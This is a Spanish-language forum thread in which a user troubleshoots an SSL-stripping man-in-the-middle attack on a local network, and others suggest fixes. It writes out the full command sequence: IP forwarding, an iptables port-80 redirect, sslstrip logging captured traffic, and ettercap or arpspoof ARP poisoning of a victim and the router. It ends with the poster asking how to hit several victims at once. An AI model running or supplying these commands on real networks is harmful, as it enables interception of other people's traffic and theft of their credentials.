Hola a todos,
estoy realizando pruebas en una lan para realizar un ataque sslstrip y ettercap.
lo primero que hago es poner el modo ip forward
echo 1 > /proc/sys/net/ipv4/ip_forward
luego redirijo el trafico de red del puerto 80 al puerto 1881 por ejemplo
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1881
hago correr el sslstrip
sslstrip -f -l 1881
hasta aquí bien, ahora vamos con el ettercap...
ettercap -T -q -i Wlan0 -M arp:remote // //
no pongo parametros para que me agregue toda la red q haya aunque tambien lo he probado poniendo la ip del pc victima y la del router el resultado fue el mismo.
he aquí el problema...
target (2 host)
0 host added to the list FATAL : ARP poisoning needs a non empty host list
Alguien sabe por que me dice esto y como puedo solucionarlo?
para mas información diré que en mi red tengo un sobremesa conectado por cable
un portatil conectado por wifi y otro portatil que es de donde lanzo el ataque con un adaptador de red alfa y de sistema es un live de linux.
Muchas gracias a todos por vuestra ayuda.
Un saludo.
He buscado y no encontre ninguna solución, nunca me tope con este problema sin embargo hasta que no encuentres una solución puedes usar arpspoof ne vez de ettercap para el spoofing, saludos.
Si pones los datos también pasaba lo mismo, no?
PD:Tenias permisos de admin o sudo?
Cita de: Stakewinner00 en 26 Noviembre 2013, 21:45 PM
He buscado y no encontre ninguna solución, nunca me tope con este problema sin embargo hasta que no encuentres una solución puedes usar arpspoof ne vez de ettercap para el spoofing, saludos.
Si pones los datos también pasaba lo mismo, no?
PD:Tenias permisos de admin o sudo?
Si, aun poniendo los parametros decia lo mismo
con los live de linux lo normal es que seas root, pero bueno seguire tu consejo de hacerlo con arpspoof mientras veo como lo resuelvo, si alguien sabe como solucionar el problema que lo ponga please.
un saludo
Sigo con los problemas esta vez en arpspoof hago lo siguiente...
echo "1" > /proc/sys/net/ipv4/ip_forward
arpspoof -i interfaz_red -t ip_victima ip_router
En otra shell
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1881
Arranco el sslstrip y digo que me haga un fichero donde guardar los datos
sslstrip -w (nombre archivo)
En otra shell
tail -f nombre archivo (para ver el fichero en vivo y directo)
Ahora cojo el pc victima y....
chaaaaannnn no me va internet a menos de que ponga manualmente "https" esto en chrome y lo mismo para mozilla.
Algún consejo?
Cita de: pira8990 en 26 Noviembre 2013, 22:23 PM
Sigo con los problemas esta vez en arpspoof hago lo siguiente...
echo "1" > /proc/sys/net/ipv4/ip_forward
arpspoof -i interfaz_red -t ip_victima ip_router
En otra shell
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1881
Arranco el sslstrip y digo que me haga un fichero donde guardar los datos
sslstrip -w (nombre archivo)
En otra shell
tail -f nombre archivo (para ver el fichero en vivo y directo)
Ahora cojo el pc victima y....
chaaaaannnn no me va internet a menos de que ponga manualmente "https" esto en chrome y lo mismo para mozilla.
Algún consejo?
Me retracto, internet si que tengo lo que no puedo es abrir ninguna pagina que vaya por hhtps ya que el ataque me esta quitando la "s" y me dice pagina no disponible, si le pongo el https manualmente si que puedo verla...
Bueno ya resolvi el problema a medias jejeje.
Lo que he hecho es redirigir las iptables al puerto 1881 y lanzar el sslstrip desde la shell y el ettercap lo que hice ha sido lanzarlo de forma grafica ettercap gtk 0.8.0 y de esta manera si que me hace el ataque.
La ultima duda que me surje es si puedo lanzar este mismo ataque a varios pc victima que esten conectados a la misma red por medio del ettercap gtk que es como puedo hacerlo yo, ¿es posible? ¿y si lo es como se haria?.
gracias.